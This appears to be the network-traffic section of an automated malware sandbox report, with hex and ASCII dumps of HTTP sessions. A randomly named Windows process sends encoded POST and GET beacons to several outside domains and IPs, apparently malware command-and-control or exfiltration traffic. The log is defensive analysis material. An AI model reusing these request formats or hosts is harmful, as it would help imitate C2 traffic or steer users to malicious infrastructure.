[TRUNCATED]
                                                        Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")4
                                                        Sep 18, 2024 16:20:59.707788944 CEST | 1236 | IN | Data Raw: 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac 1f 45 42 2c
                                                        Data Ascii: I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC<v'%$SIi
                                                        Sep 18, 2024 16:20:59.707825899 CEST | 883 | IN | Data Raw: ab bb f9 ab bb f6 c0 1e d8 2e 6e 8d f3 a1 91 21 67 7d c1 dd 9e 64 53 6b bc 39 3c ca b6 7e 2c e4 73 f6 74 d6 59 ef 77 d6 af db 4b 37 dc d5 49 be ce 5e a7 f8 37 02 df 13 87 44 db 60 8e 0d 2f 3b c3 0b 6c 61 c4 be d9 6b f7 0c fb 29 78 67 e3 aa 3d b6
                                                        Data Ascii: .n!g}dSk9<~,stYwK7I^7D`/;lak)xg=TzYxioKk<{$dZ"TQ{=dB$&K'lg~+si5ZJ]p~{dd+`;/"sB2q2EAKc/RD1pt").PU+(m


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        44 | 192.168.2.5 | 53662 | 188.114.97.3 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:21:01.251832962 CEST | 560 | OUT | GET /mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:02.598659039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:21:02 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYfRG4D1AXx1pQ8hcwLeUJhtixVuTUsut%2FfCYHLsG2pMLeVmDiFfMG9lKLwMZxcgVUWmWQAgZ4VK0V4BMxXlS28h1A%2F8w0pas86j%2BZJeRMO7CRY5575JOoodnOcxi9tx2ho%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fae56a0543b6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED]
                                                        Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.
                                                        Sep 18, 2024 16:21:02.598691940 CEST1236INData Raw: 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a
                                                        Data Ascii: 3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd112
                                                        Sep 18, 2024 16:21:02.598705053 CEST1236INData Raw: 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 09 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e
                                                        Data Ascii: ></div><div class="login"><a rel="nofollow" href="http://www.chinaen.org/zb_system/login.php" target="_blank"></a></div><div class="search"><form name="search" method="get" action="http://www.chinaen.org/search.php?
                                                        Sep 18, 2024 16:21:02.599306107 CEST1236INData Raw: 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 a1 b5 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 6d 61 69 6e 5f 73
                                                        Data Ascii: "></a></div></div></div></div>... main_side --><div class="main_side"> <div class="widget widget_previous"><div class="title"></div><ul><li><a hre
                                                        Sep 18, 2024 16:21:02.599319935 CEST1236INData Raw: 6e 20 63 6c 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 35 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f
                                                        Data Ascii: n class="datetime"> (08-25)</span></span></li><li><a href="http://www.chinaen.org/lol/200.html" target="_blank" title="10v10 ">10v10 </a><span>3<span class="da
                                                        Sep 18, 2024 16:21:02.599927902 CEST1236INData Raw: 3d 22 5b e4 b8 80 e5 9b be e6 b5 81 5d e9 a3 8e e9 be 99 e5 a4 a7 e6 88 98 ef bc 8c e5 b0 8f e8 83 96 e5 ae ab e6 9c ac e8 bd ac e8 ba ab e6 8b bf e9 be 99 ef bc 8c e5 90 8e e7 bb ad e8 bf 9b e5 9c ba ef bc 8c e5 8f 96 e5 be 97 e4 b8 89 e6 9d 80
                                                        Data Ascii: ="[] ">[] </a><span>4<span class="datetime"> (08-2
                                                        Sep 18, 2024 16:21:02.599955082 CEST1091INData Raw: 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 75 70 22 3e 3c 2f 69 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31
                                                        Data Ascii: ="fa fa-angle-up"></i></div><script src="http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4" type="text/javascript"></script><script src="http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4" type=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 53663 | 13.248.169.48 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:07.916275024 CEST | 837 | OUT | POST /f1gw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.study-in-nyc.online
Origin: http://www.study-in-nyc.online
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Connection: close
Cache-Control: max-age=0
Referer: http://www.study-in-nyc.online/f1gw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 69 42 75 64 7a 59 53 65 49 44 6d 50 4a 67 51 79 4b 51 31 67 50 71 76 66 6b 59 73 44 38 2f 4c 2b 44 34 62 48 57 4a 44 6d 37 70 4c 35 38 36 52 45 65 2b 44 58 50 37 6f 44 39 2b 59 2b 67 68 52 58 4e 48 68 30 69 38 77 38 67 30 75 58 51 47 35 48 48 44 57 70 55 61 76 41 68 43 2b 70 6d 63 35 75 62 52 64 51 62 36 6a 4b 6a 52 55 4a 77 58 76 6d 4b 36 55 70 69 4f 2b 6d 6a 55 59 69 31 64 58 61 48 2b 47 79 73 52 39 4c 31 73 2f 61 47 54 41 32 35 6a 2b 71 76 71 4a 4f 6a 6a 71 2b 4f 74 41 78 39 79 55 70 50 47 49 48 5a 50 59 4c 46 52 2b 33 75 4d 50 6b 4c 51 35 70 50 6f 63 3d
Data Ascii: x0wHoJ8X=kZTPD4Ws4x7ZiBudzYSeIDmPJgQyKQ1gPqvfkYsD8/L+D4bHWJDm7pL586REe+DXP7oD9+Y+ghRXNHh0i8w8g0uXQG5HHDWpUavAhC+pmc5ubRdQb6jKjRUJwXvmK6UpiO+mjUYi1dXaH+GysR9L1s/aGTA25j+qvqJOjjq+OtAx9yUpPGIHZPYLFR+3uMPkLQ5pPoc=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 53664 | 13.248.169.48 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:10.467174053 CEST | 857 | OUT | POST /f1gw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.study-in-nyc.online
Origin: http://www.study-in-nyc.online
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
Connection: close
Cache-Control: max-age=0
Referer: http://www.study-in-nyc.online/f1gw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 6a 67 65 64 78 2f 47 65 64 54 6d 41 58 77 51 79 63 67 31 6b 50 71 7a 66 6b 61 41 54 2f 4a 37 2b 43 61 54 48 56 4c 6e 6d 6f 5a 4c 35 7a 61 52 4c 61 2b 44 71 50 37 6b 74 39 2f 6b 2b 67 68 56 58 4e 46 70 30 6a 4d 4d 2f 6d 30 75 56 61 57 35 42 61 7a 57 70 55 61 76 41 68 47 58 4f 6d 63 78 75 61 68 4e 51 62 65 33 46 67 52 55 4f 6d 48 76 6d 4f 36 55 6c 69 4f 2f 7a 6a 56 31 2f 31 66 66 61 48 2f 32 79 72 46 70 55 76 38 2f 63 4d 7a 42 79 39 7a 76 79 32 4c 59 48 70 52 44 32 66 74 51 73 31 6b 35 44 56 6b 41 76 4b 76 30 7a 56 43 32 41 2f 38 75 4e 52 7a 70 5a 52 2f 4c 32 52 72 42 32 6a 50 78 55 47 48 6f 42 6e 4d 36 6f 2b 47 38 2b
Data Ascii: x0wHoJ8X=kZTPD4Ws4x7Zjgedx/GedTmAXwQycg1kPqzfkaAT/J7+CaTHVLnmoZL5zaRLa+DqP7kt9/k+ghVXNFp0jMM/m0uVaW5BazWpUavAhGXOmcxuahNQbe3FgRUOmHvmO6UliO/zjV1/1ffaH/2yrFpUv8/cMzBy9zvy2LYHpRD2ftQs1k5DVkAvKv0zVC2A/8uNRzpZR/L2RrB2jPxUGHoBnM6o+G8+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 53665 | 13.248.169.48 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:13.009901047 CEST | 1874 | OUT | POST /f1gw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.study-in-nyc.online
Origin: http://www.study-in-nyc.online
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Connection: close
Cache-Control: max-age=0
Referer: http://www.study-in-nyc.online/f1gw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 6a 67 65 64 78 2f 47 65 64 54 6d 41 58 77 51 79 63 67 31 6b 50 71 7a 66 6b 61 41 54 2f 4b 62 2b 44 76 66 48 58 71 6e 6d 72 5a 4c 35 36 36 52 62 61 2b 44 37 50 37 73 70 39 2f 6f 75 67 6a 64 58 4d 67 39 30 7a 75 6f 2f 31 55 75 56 55 47 35 41 48 44 58 30 55 61 2f 45 68 43 37 4f 6d 63 78 75 61 6a 6c 51 50 61 6a 46 6d 52 55 4a 77 58 76 55 4b 36 55 4a 69 4f 33 6a 6a 56 78 76 67 2b 2f 61 48 66 6d 79 74 7a 56 55 6b 38 2f 65 4c 7a 42 55 39 7a 6a 54 32 4c 46 38 70 52 62 63 66 76 77 73 2f 69 30 69 53 55 63 30 5a 4a 30 66 57 77 69 74 72 70 69 2f 55 79 56 4c 63 59 6a 32 4f 4a 41 5a 31 76 63 52 48 31 73 4d 7a 49 50 34 77 51 6f 79 53 39 76 56 4e 70 52 37 4f 32 4f 4e 72 4f 63 4a 5a 31 6c 6c 48 77 2b 44 39 53 38 46 79 68 43 34 38 46 7a 73 45 31 7a 2b 6a 57 69 79 6c 4f 30 59 70 6a 59 4f 52 30 63 67 71 43 4d 72 79 37 4c 51 56 31 48 73 71 64 45 35 55 6d 54 4f 4a 78 53 69 49 52 6c 57 6a 4e 34 4c 69 6d 61 2f 2f 2f 64 33 4f 32 46 2b 2f 66 49 39 7a 67 39 69 2f [TRUNCATED]
Data Ascii: x0wHoJ8X= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 53666 | 13.248.169.48 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:15.637356043 CEST | 568 | OUT | GET /f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.study-in-nyc.online
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 18, 2024 16:21:16.091551065 CEST | 410 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 18 Sep 2024 14:21:16 GMT
Content-Type: text/html
Content-Length: 270
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 70 62 37 76 41 4d 47 79 67 43 7a 67 69 6c 36 4b 69 61 6d 66 4f 79 33 56 58 7a 41 33 58 69 39 73 4c 5a 76 30 79 71 45 36 33 34 71 55 61 4c 48 4d 52 4b 61 6e 2f 75 2b 46 31 5a 59 2b 54 74 2f 6f 43 37 55 64 6c 76 6f 54 2f 52 52 38 4c 77 68 62 68 64 45 63 30 31 69 4f 56 6b 42 78 43 69 72 73 45 61 76 32 79 7a 4c 64 69 38 35 62 66 69 34 58 54 70 58 42 67 56 49 41 73 6b 2b 30 49 71 5a 7a 2f 77 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.5 | 53667 | 148.72.152.174 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:37.710448980 CEST | 825 | OUT | POST /2jit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.elsupertodo.net
Origin: http://www.elsupertodo.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Connection: close
Cache-Control: max-age=0
Referer: http://www.elsupertodo.net/2jit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 43 79 37 50 48 4b 39 57 4a 31 46 4b 49 6a 6c 6a 4f 71 47 77 42 6b 77 77 6c 50 75 37 6b 55 6e 74 49 37 71 73 65 48 71 56 6c 74 57 62 2f 66 49 72 7a 33 7a 54 6d 6f 53 75 4b 31 4a 75 6f 66 45 67 75 6d 4c 6f 2f 46 77 71 55 4c 38 4a 62 43 53 62 45 71 6f 30 41 35 7a 4d 6e 33 61 4e 64 61 62 53 65 67 42 6f 38 47 6d 4f 56 57 64 65 61 4e 2f 55 71 67 67 47 6a 76 57 46 50 6b 2f 2b 6e 7a 68 44 75 66 6a 68 46 41 51 37 33 4b 5a 70 4d 41 4e 45 4f 33 55 4d 46 65 2b 64 38 62 76 30 76 7a 67 71 52 6f 42 63 76 57 61 46 70 62 48 44 69 75 64 74 58 34 50 33 4a 70 6d 32 38 49 51 3d
Data Ascii: x0wHoJ8X=vQQv7Y9b9dgTCy7PHK9WJ1FKIjljOqGwBkwwlPu7kUntI7qseHqVltWb/fIrz3zTmoSuK1JuofEgumLo/FwqUL8JbCSbEqo0A5zMn3aNdabSegBo8GmOVWdeaN/UqggGjvWFPk/+nzhDufjhFAQ73KZpMANEO3UMFe+d8bv0vzgqRoBcvWaFpbHDiudtX4P3Jpm28IQ=
Sep 18, 2024 16:21:38.233175039 CEST | 391 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 18 Sep 2024 14:21:38 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.elsupertodo.net/2jit/
X-XSS-Protection: 1; mode=block
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.5 | 53668 | 148.72.152.174 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:40.260744095 CEST | 845 | OUT | POST /2jit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.elsupertodo.net
Origin: http://www.elsupertodo.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
Connection: close
Cache-Control: max-age=0
Referer: http://www.elsupertodo.net/2jit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 45 53 72 50 55 64 4a 57 4f 56 46 4c 48 44 6c 6a 41 4b 47 73 42 6b 4d 77 6c 4f 71 72 6a 6d 44 74 49 5a 69 73 66 47 71 56 6f 4e 57 62 72 50 49 75 2b 58 7a 49 6d 6f 66 64 4b 30 31 75 6f 66 51 67 75 6b 44 6f 2b 30 77 72 53 62 38 4c 52 53 53 64 48 61 6f 30 41 35 7a 4d 6e 33 2b 7a 64 65 33 53 65 51 78 6f 37 58 6d 42 66 32 64 64 54 74 2f 55 38 51 67 4b 6a 76 58 51 50 6d 61 70 6e 32 74 44 75 66 7a 68 46 53 34 36 39 4b 5a 76 43 67 4d 52 47 6d 70 33 43 49 71 53 2f 71 36 6d 78 53 73 52 51 65 73 32 31 30 53 74 36 37 72 37 79 39 56 61 47 49 75 65 54 4b 32 47 69 66 48 63 7a 66 69 52 6b 4e 72 42 62 39 56 74 7a 4b 34 32 69 66 70 39
Data Ascii: x0wHoJ8X=vQQv7Y9b9dgTESrPUdJWOVFLHDljAKGsBkMwlOqrjmDtIZisfGqVoNWbrPIu+XzImofdK01uofQgukDo+0wrSb8LRSSdHao0A5zMn3+zde3SeQxo7XmBf2ddTt/U8QgKjvXQPmapn2tDufzhFS469KZvCgMRGmp3CIqS/q6mxSsRQes210St67r7y9VaGIueTK2GifHczfiRkNrBb9VtzK42ifp9
Sep 18, 2024 16:21:40.764022112 CEST | 391 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 18 Sep 2024 14:21:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.elsupertodo.net/2jit/
X-XSS-Protection: 1; mode=block
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.5 | 53669 | 148.72.152.174 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 16:21:42.810950041 CEST | 1862 | OUT | POST /2jit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.elsupertodo.net
Origin: http://www.elsupertodo.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Connection: close
Cache-Control: max-age=0
Referer: http://www.elsupertodo.net/2jit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
